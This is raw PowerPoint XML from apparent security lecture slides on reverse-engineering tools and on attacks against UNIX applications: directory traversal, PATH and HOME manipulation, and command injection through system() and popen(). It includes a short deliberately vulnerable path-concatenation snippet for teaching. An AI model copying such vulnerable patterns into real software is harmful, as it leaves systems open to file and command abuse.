                                              <p:pRg st="11" end="11"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="12" end="12"/>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85107"/>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98509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985091">
                                            <p:txEl>
                                              <p:pRg st="13" end="13"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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985091">
                                            <p:txEl>
                                              <p:pRg st="15" end="15"/>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985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2" grpId="0" animBg="1"/>
      <p:bldP spid="985093" grpId="0" animBg="1"/>
      <p:bldP spid="985094" grpId="0" animBg="1"/>
      <p:bldP spid="985095" grpId="0" animBg="1"/>
      <p:bldP spid="985096" grpId="0" animBg="1"/>
      <p:bldP spid="985097" grpId="0" animBg="1"/>
      <p:bldP spid="985098" grpId="0" animBg="1"/>
      <p:bldP spid="985099" grpId="0"/>
      <p:bldP spid="985100" grpId="0"/>
      <p:bldP spid="985101" grpId="0" animBg="1"/>
      <p:bldP spid="985102" grpId="0" animBg="1"/>
      <p:bldP spid="985103" grpId="0" animBg="1"/>
      <p:bldP spid="985104" grpId="0" animBg="1"/>
      <p:bldP spid="985105" grpId="0" animBg="1"/>
      <p:bldP spid="985106" grpId="0" animBg="1"/>
      <p:bldP spid="985107" grpId="0" animBg="1"/>
      <p:bldP spid="98510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Disassembling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling is the process of extracting the assembly representation of a program by analyzing its binary representation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassemblers can be:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linear: linearly parse the instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recursive: attempt to follow the flow of the program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57212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Radare</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Radare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is a program analysis tool</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rada.re</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/r/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports reversing and vulnerability analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembling of binaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forensic analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports collaborative analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145742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IDA Pro</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IDA Pro is the state-of-the-art tool for reversing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hex-rays.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/products/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ida</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It supports disassembling of binary programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Hex-Rays </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be integrated with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and other debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product (expensive)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A limited version is available for free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79938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Hopper</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disassembler that supports sophisticated analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.hopperapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Includes a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>decompiler</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is a commercial product but:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It can be used for free (with limitations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is not very expensive (~90$)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="53193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Attacking UNIX Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against a network service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against the operating system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks against a browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks against SUID applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks against the operating system </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18853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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking UNIX Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514051" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>99% of the local vulnerabilities in UNIX systems exploit SUID-root programs to obtain root privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1% of the attacks target the operating system kernel itself</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking SUID applications is based on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Startup: command line, environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>During execution: dynamic-linked objects, file input, socket input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interaction with the environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>File system: creation of files, access to files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes: signals, invocation of other commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes defining the boundaries of an application is not easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93736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4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4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4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40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40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40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405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405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405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40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Attack Classes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>File access attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>TOCTTOU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>File handler reuse</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory Corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack corruption </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Format string exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4504268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File Access Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access to files in the file system is performed by using path strings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an attacker has a way to control how or when a privileged application builds a path string, it can lure the application into violating the security policy of the system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154713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Application Vulnerability Analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Application vulnerability analysis is the process of identifying vulnerabilities in applications, as deployed in a specific operational environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Design vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementation vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="110852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Dot-Dot Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application builds a path by concatenating a path prefix with values provided by the user (the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>path = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strncat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("/&lt;initial path&gt;/", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>user_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>free_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>file = open(path, O_RDWR);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user (attacker) provides a filename containing a number of “..” that allow for escaping from the directory and access any file in the file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also called: directory traversal attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92355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 and HOME Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The PATH environment variable determines how the shell searches for commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application invokes commands without specifying the complete path, it is possible to induce an application to execute a different version (controlled by the attacker) of the external command</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execlp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>execvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() use the shell PATH variable to locate applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The HOME environment variable determines how the home directory path is expanded by the shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If an application uses using a home-relative path  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(e.g., ~/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>myfile.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), an attacker can modify his/her $HOME variable to control the execution of commands (or the access to files)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46107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6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="417797" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications invoke external commands to carry out specific tasks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(&lt;string&gt;) executes a command specified in a string by calling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="838200" lvl="1" indent="-381000"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -c &lt;string&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>popen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() opens a process by creating a pipe, forking, and invoking the shell as in system()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the user can control the string passed to these functions, it can inject additional commands</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14183633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77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77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77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77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77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Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">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err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
